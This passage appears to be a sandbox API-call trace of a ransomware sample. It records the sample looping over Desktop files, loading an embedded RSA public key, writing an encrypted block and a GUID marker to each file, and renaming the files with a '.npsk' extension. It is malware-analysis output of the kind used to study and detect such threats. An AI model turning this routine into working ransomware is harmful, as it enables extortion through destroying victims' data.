KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.684] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.685] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.685] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.685] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.685] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.685] SetLastError (dwErrCode=0x0) [0214.685] GetLastError () returned 0x0 [0214.686] SetLastError (dwErrCode=0x0) [0214.686] GetLastError () returned 0x0 [0214.686] SetLastError (dwErrCode=0x0) [0214.686] GetLastError () returned 0x0 [0214.686] SetLastError (dwErrCode=0x0) [0214.686] GetLastError () returned 0x0 [0214.686] SetLastError (dwErrCode=0x0) [0214.686] GetLastError () returned 0x0 [0214.686] SetLastError (dwErrCode=0x0) [0214.686] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.686] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.686] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.686] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.686] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.686] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.686] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.688] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3225448, Size=0x218) returned 0x32ef888 [0214.688] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb1400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.688] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.689] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.689] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.689] CloseHandle (hObject=0x61c) returned 1 [0214.699] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe.npsk")) returned 1 [0214.700] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0214.700] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.700] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.701] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.701] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77626480, ftCreationTime.dwHighDateTime=0x1d5da30, ftLastAccessTime.dwLowDateTime=0x2554c170, ftLastAccessTime.dwHighDateTime=0x1d5dfd4, ftLastWriteTime.dwLowDateTime=0x2554c170, ftLastWriteTime.dwHighDateTime=0x1d5dfd4, nFileSizeHigh=0x0, nFileSizeLow=0x7b4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1hZIh39I2.jpg", cAlternateFileName="1HZIH3~1.JPG")) returned 1 [0214.701] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hZIh39I2.jpg") returned=".jpg" [0214.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hZIh39I2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hzih39i2.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.701] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=31562) returned 1 [0214.701] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.703] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7b24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.703] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.704] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7b4a, lpOverlapped=0x0) returned 1 [0214.704] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.705] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.706] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.707] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.707] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.707] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.707] SetLastError (dwErrCode=0x0) [0214.707] GetLastError () returned 0x0 [0214.708] SetLastError (dwErrCode=0x0) [0214.708] GetLastError () returned 0x0 [0214.708] SetLastError (dwErrCode=0x0) [0214.708] GetLastError () returned 0x0 [0214.708] SetLastError (dwErrCode=0x0) [0214.708] GetLastError () returned 0x0 [0214.708] SetLastError (dwErrCode=0x0) [0214.708] GetLastError () returned 0x0 [0214.708] SetLastError (dwErrCode=0x0) [0214.708] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.708] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.708] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.708] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.708] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.708] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x32ef888 [0214.709] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7b4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.709] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.709] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.709] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.709] CloseHandle (hObject=0x61c) returned 1 [0214.711] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hZIh39I2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hzih39i2.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hZIh39I2.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hzih39i2.jpg.npsk")) returned 1 [0214.713] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0214.713] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.713] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.714] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.714] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3cd68b0, ftCreationTime.dwHighDateTime=0x1d5e41a, ftLastAccessTime.dwLowDateTime=0xf6acb7c0, ftLastAccessTime.dwHighDateTime=0x1d5e5ea, ftLastWriteTime.dwLowDateTime=0xf6acb7c0, ftLastWriteTime.dwHighDateTime=0x1d5e5ea, nFileSizeHigh=0x0, nFileSizeLow=0xa72a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7_DS.odt", cAlternateFileName="")) returned 1 [0214.714] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7_DS.odt") returned=".odt" [0214.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7_DS.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7_ds.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.715] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=42794) returned 1 [0214.715] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.718] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa704, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.718] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.720] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa72a, lpOverlapped=0x0) returned 1 [0214.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.721] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.722] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.722] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.722] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.722] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.722] GetLastError () returned 0x0 [0214.722] SetLastError (dwErrCode=0x0) [0214.722] GetLastError () returned 0x0 [0214.722] SetLastError (dwErrCode=0x0) [0214.722] GetLastError () returned 0x0 [0214.722] SetLastError (dwErrCode=0x0) [0214.722] GetLastError () returned 0x0 [0214.722] SetLastError (dwErrCode=0x0) [0214.722] GetLastError () returned 0x0 [0214.722] SetLastError (dwErrCode=0x0) [0214.722] GetLastError () returned 0x0 [0214.722] SetLastError (dwErrCode=0x0) [0214.722] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] GetLastError () returned 0x0 [0214.723] SetLastError (dwErrCode=0x0) [0214.723] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.723] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.723] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.723] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.724] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.724] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.725] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa72a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.725] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.725] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.725] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.725] CloseHandle (hObject=0x61c) returned 1 [0214.727] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7_DS.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7_ds.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7_DS.odt.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7_ds.odt.npsk")) returned 1 [0214.728] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ef88 | out: hHeap=0x750000) returned 1 [0214.728] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.729] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.730] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c326ef0, ftCreationTime.dwHighDateTime=0x1d5e5e3, ftLastAccessTime.dwLowDateTime=0xb90a0680, ftLastAccessTime.dwHighDateTime=0x1d5db7b, ftLastWriteTime.dwLowDateTime=0xb90a0680, ftLastWriteTime.dwHighDateTime=0x1d5db7b, nFileSizeHigh=0x0, nFileSizeLow=0xaae2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9uB41.ods", cAlternateFileName="")) returned 1 [0214.730] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9uB41.ods") returned=".ods" [0214.730] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9uB41.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9ub41.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.733] GetFileSizeEx (in: hFile=0x61c, 